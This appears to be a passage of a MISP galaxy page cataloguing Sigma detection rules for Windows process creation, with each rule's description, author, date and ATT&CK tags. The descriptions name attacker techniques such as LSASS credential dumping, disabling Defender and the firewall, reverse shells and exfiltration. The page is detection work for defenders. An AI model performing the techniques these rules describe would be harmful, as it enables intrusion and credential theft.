Metadata key Value
author Furkan Caliskan (@caliskanfurkan_)
creation_date 2020/07/04
falsepositive ['Legitimate admin usage']
filename proc_creation_win_pua_ditsnap.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

MMC20 Lateral Movement

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

Internal MISP references

UUID f1f3bf22-deb2-418d-8cce-e1a45e46a5bd which can be used as unique global reference for MMC20 Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
creation_date 2020/03/04
falsepositive ['Unlikely']
filename proc_creation_win_mmc_mmc20_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

File Decryption Using Gpg4win

Detects usage of Gpg4win to decrypt files

Internal MISP references

UUID 037dcd71-33a8-4392-bb01-293c94663e5a which can be used as unique global reference for File Decryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_decryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Renamed PsExec Service Execution

Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators

Internal MISP references

UUID 51ae86a2-e2e1-4097-ad85-c46cb6851de4 which can be used as unique global reference for Renamed PsExec Service Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_renamed_sysinternals_psexec_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Operator Bloopers Cobalt Strike Commands

Detects use of Cobalt Strike commands accidentally entered in the CMD shell

Internal MISP references

UUID 647c7b9e-d784-4fda-b9a0-45c565a7b729 which can be used as unique global reference for Operator Bloopers Cobalt Strike Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/05/06
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003', 'stp.1u']
Related clusters

To see the related clusters, click here.

Audit Policy Tampering Via Auditpol

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Internal MISP references

UUID 0a13e132-651d-11eb-ae93-0242ac130002 which can be used as unique global reference for Audit Policy Tampering Via Auditpol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe (https://github.com/blueteam0ps)
creation_date 2021/02/02
falsepositive ['Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored']
filename proc_creation_win_auditpol_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Chromium Browser Headless Execution To Mockbin Like Site

Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

Internal MISP references

UUID 1c526788-0abe-4713-862f-b520da5e5316 which can be used as unique global reference for Chromium Browser Headless Execution To Mockbin Like Site in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_mockbin_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential Commandline Obfuscation Using Unicode Characters

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Internal MISP references

UUID e0552b19-5a83-4222-b141-b36184bb8d79 which can be used as unique global reference for Potential Commandline Obfuscation Using Unicode Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/01/15
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_unicode.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Powershell Token Obfuscation - Process Creation

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Internal MISP references

UUID deb9b646-a508-44ee-b7c9-d8965921c6b6 which can be used as unique global reference for Powershell Token Obfuscation - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_powershell_token_obfuscation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.009']
Related clusters

To see the related clusters, click here.

PUA - Radmin Viewer Utility Execution

Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines

Internal MISP references

UUID 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d which can be used as unique global reference for PUA - Radmin Viewer Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename proc_creation_win_pua_radmin.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1072']
Related clusters

To see the related clusters, click here.

Windows Firewall Disabled via PowerShell

Detects attempts to disable the Windows Firewall using PowerShell

Internal MISP references

UUID 12f6b752-042d-483e-bf9c-915a6d06ad75 which can be used as unique global reference for Windows Firewall Disabled via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/14
falsepositive ['Unknown']
filename proc_creation_win_powershell_disable_firewall.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Browser Started with Remote Debugging

Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks

Internal MISP references

UUID b3d34dc5-2efd-4ae3-845f-8ec14921f449 which can be used as unique global reference for Browser Started with Remote Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/27
falsepositive ['Unknown']
filename proc_creation_win_browsers_remote_debugging.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1185']
Related clusters

To see the related clusters, click here.

Suspicious Kernel Dump Using Dtrace

Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1

Internal MISP references

UUID 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 which can be used as unique global reference for Suspicious Kernel Dump Using Dtrace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/28
falsepositive ['Unknown']
filename proc_creation_win_dtrace_kernel_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Privilege Escalation via Named Pipe Impersonation

Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.

Internal MISP references

UUID 9bd04a79-dabe-4f1f-a5ff-92430265c96b which can be used as unique global reference for Privilege Escalation via Named Pipe Impersonation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Other programs that cause these patterns (please report)']
filename proc_creation_win_susp_priv_escalation_via_named_pipe.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021']
Related clusters

To see the related clusters, click here.

Suspicious Double Extension File Execution

Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns

Internal MISP references

UUID 1cdd9a09-06c9-4769-99ff-626e2b3991b8 which can be used as unique global reference for Suspicious Double Extension File Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/06/26
falsepositive ['Unknown']
filename proc_creation_win_susp_double_extension.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Setupapi.dll Activity

setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.

Internal MISP references

UUID 285b85b1-a555-4095-8652-a8a4106af63f which can be used as unique global reference for Suspicious Rundll32 Setupapi.dll Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/07
falsepositive ['Scripts and administrative tools that use INF files for driver installation with setupapi.dll']
filename proc_creation_win_rundll32_setupapi_installhinfsection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Execution From GUID Like Folder Names

Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks

Internal MISP references

UUID 90b63c33-2b97-4631-a011-ceb0f47b77c3 which can be used as unique global reference for Suspicious Execution From GUID Like Folder Names in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly']
filename proc_creation_win_susp_execution_from_guid_folder_names.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Service Installation

Detects the installation of VsCode tunnel (code-tunnel) as a service.

Internal MISP references

UUID 30bf1789-379d-4fdc-900f-55cd0a90a801 which can be used as unique global reference for Visual Studio Code Tunnel Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate installation of code-tunnel as a service']
filename proc_creation_win_vscode_tunnel_service_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Name As GUID

Detects creation of a scheduled task with a GUID like name

Internal MISP references

UUID ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b which can be used as unique global reference for Suspicious Scheduled Task Name As GUID in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate software naming their tasks as GUIDs']
filename proc_creation_win_schtasks_guid_task_name.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Suspicious Key Manager Access

Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)

Internal MISP references

UUID a4694263-59a8-4608-a3a0-6f8d3a51664c which can be used as unique global reference for Suspicious Key Manager Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/21
falsepositive ['Administrative activity']
filename proc_creation_win_rundll32_keymgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Stop Windows Service Via PowerShell Stop-Service

Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"

Internal MISP references

UUID c49c5062-0966-4170-9efd-9968c913a6cf which can be used as unique global reference for Stop Windows Service Via PowerShell Stop-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_powershell_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution

Detects potentially suspicious child processes launched via the ScreenConnect client service.

Internal MISP references

UUID 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale
creation_date 2022/02/25
falsepositive ['If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.']
filename proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious Recursive Takeown

Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders

Internal MISP references

UUID 554601fb-9b71-4bcc-abf4-21a611be4fde which can be used as unique global reference for Suspicious Recursive Takeown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/30
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_win_takeown_recursive_own.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222.001']
Related clusters

To see the related clusters, click here.

Windows Defender Definition Files Removed

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

Internal MISP references

UUID 9719a8aa-401c-41af-8108-ced7ec9cd75c which can be used as unique global reference for Windows Defender Definition Files Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/07
falsepositive ['Unknown']
filename proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Execution via WorkFolders.exe

Detects using WorkFolders.exe to execute an arbitrary control.exe

Internal MISP references

UUID 0bbc6369-43e3-453d-9944-cae58821c173 which can be used as unique global reference for Execution via WorkFolders.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut)
creation_date 2021/10/21
falsepositive ['Legitimate usage of the uncommon Windows Work Folders feature.']
filename proc_creation_win_susp_workfolders.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Command Patterns In Scheduled Task Creation

Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

Internal MISP references

UUID f2c64357-b1d2-41b7-849f-34d2682c0fad which can be used as unique global reference for Suspicious Command Patterns In Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives']
filename proc_creation_win_schtasks_susp_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender Remove-MpPreference

Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet

Internal MISP references

UUID 07e3cb2c-0608-410d-be4b-1511cb1a0448 which can be used as unique global reference for Tamper Windows Defender Remove-MpPreference in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate PowerShell scripts']
filename proc_creation_win_powershell_remove_mppreference.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via WER

Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass

Internal MISP references

UUID 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 which can be used as unique global reference for Potential Credential Dumping Via WER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash , Nasreddine Bencherchali
creation_date 2022/12/08
falsepositive ['Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.']
filename proc_creation_win_werfault_lsass_shtinkering.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PUA- IOX Tunneling Tool Execution

Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

Internal MISP references

UUID d7654f02-e04b-4934-9838-65c46f187ebc which can be used as unique global reference for PUA- IOX Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/08
falsepositive ['Legitimate use']
filename proc_creation_win_pua_iox.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

Detects Obfuscated Powershell via VAR++ LAUNCHER

Internal MISP references

UUID e9f55347-2928-4c06-88e5-1a7f8169942e which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_var.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious CustomShellHost Execution

Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'

Internal MISP references

UUID 84b14121-9d14-416e-800b-f3b829c5a14d which can be used as unique global reference for Suspicious CustomShellHost Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_customshellhost.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Dllhost.EXE Execution Anomaly

Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.

Internal MISP references

UUID e7888eb1-13b0-4616-bd99-4bc0c2b054b9 which can be used as unique global reference for Dllhost.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/27
falsepositive ['Unlikely']
filename proc_creation_win_dllhost_no_cli_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Elevated System Shell Spawned From Uncommon Parent Location

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.

Internal MISP references

UUID 178e615d-e666-498b-9630-9ed363038101 which can be used as unique global reference for Elevated System Shell Spawned From Uncommon Parent Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Tim Shelton (update fp)
creation_date 2022/12/05
falsepositive ['Unknown']
filename proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Renamed CreateDump Utility Execution

Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory

Internal MISP references

UUID 1a1ed54a-2ba4-4221-94d5-01dee560d71e which can be used as unique global reference for Renamed CreateDump Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/20
falsepositive ['Command lines that use the same flags']
filename proc_creation_win_renamed_createdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Assembly Loading Via CL_LoadAssembly.ps1

Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.

Internal MISP references

UUID c57872c7-614f-4d7f-a40d-b78c8df2d30d which can be used as unique global reference for Assembly Loading Via CL_LoadAssembly.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_loadassembly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnel Connections Cleanup

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.

Internal MISP references

UUID 7050bba1-1aed-454e-8f73-3f46f09ce56a which can be used as unique global reference for Cloudflared Tunnel Connections Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Legitimate usage of Cloudflared.']
filename proc_creation_win_cloudflared_tunnel_cleanup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Windows Admin Share Mount Via Net.EXE

Detects when an admin share is mounted using net.exe

Internal MISP references

UUID 3abd6094-7027-475f-9630-8ab9be7b9725 which can be used as unique global reference for Windows Admin Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
creation_date 2020/10/05
falsepositive ['Administrators']
filename proc_creation_win_net_use_mount_admin_share.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).

Internal MISP references

UUID 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 which can be used as unique global reference for WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_rundll32_webdav_client_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)

Internal MISP references

UUID e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e which can be used as unique global reference for Disable Windows IIS HTTP Logging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename proc_creation_win_iis_appcmd_http_logging.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Renamed MegaSync Execution

Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

Internal MISP references

UUID 643bdcac-8b82-49f4-9fd9-25a90b929f3b which can be used as unique global reference for Renamed MegaSync Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/22
falsepositive ['Software that illegally integrates MegaSync in a renamed form', 'Administrators that have renamed MegaSync']
filename proc_creation_win_renamed_megasync.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Persistence Attempt Via Run Keys Using Reg.EXE

Detects suspicious command line reg.exe tool adding key to RUN key in Registry

Internal MISP references

UUID de587dce-915e-4218-aac4-835ca6af6f70 which can be used as unique global reference for Potential Persistence Attempt Via Run Keys Using Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/28
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.', 'Legitimate administrator sets up autorun keys for legitimate reasons.', 'Discord']
filename proc_creation_win_reg_add_run_key.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

HackTool - Empire PowerShell UAC Bypass

Detects some Empire PowerShell UAC bypass methods

Internal MISP references

UUID 3268b746-88d8-4cd3-bffc-30077d02c787 which can be used as unique global reference for HackTool - Empire PowerShell UAC Bypass in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco
creation_date 2019/08/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_empire_powershell_uac_bypass.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Potential Shim Database Persistence via Sdbinst.EXE

Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

Internal MISP references

UUID 517490a7-115a-48c6-8862-1a481504d5a8 which can be used as unique global reference for Potential Shim Database Persistence via Sdbinst.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_sdbinst_shim_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Data Copied To Clipboard Via Clip.EXE

Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

Internal MISP references

UUID ddeff553-5233-4ae9-bbab-d64d2bd634be which can be used as unique global reference for Data Copied To Clipboard Via Clip.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_clip_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Php Inline Command Execution

Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.

Internal MISP references

UUID d81871ef-5738-47ab-9797-7a9c90cd4bfb which can be used as unique global reference for Php Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_php_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Workstation Locking via Rundll32

Detects a suspicious call to the user32.dll function that locks the user workstation

Internal MISP references

UUID 3b5b0213-0460-4e3f-8937-3abf98ff7dcc which can be used as unique global reference for Suspicious Workstation Locking via Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/04
falsepositive ['Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option']
filename proc_creation_win_rundll32_user32_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Arbitrary File Download Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Internal MISP references

UUID 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c which can be used as unique global reference for Arbitrary File Download Via Squirrel.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2022/06/09
falsepositive ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)']
filename proc_creation_win_squirrel_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - RunXCmd Execution

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

Internal MISP references

UUID 93199800-b52a-4dec-b762-75212c196542 which can be used as unique global reference for PUA - RunXCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_runxcmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

DumpMinitool Execution

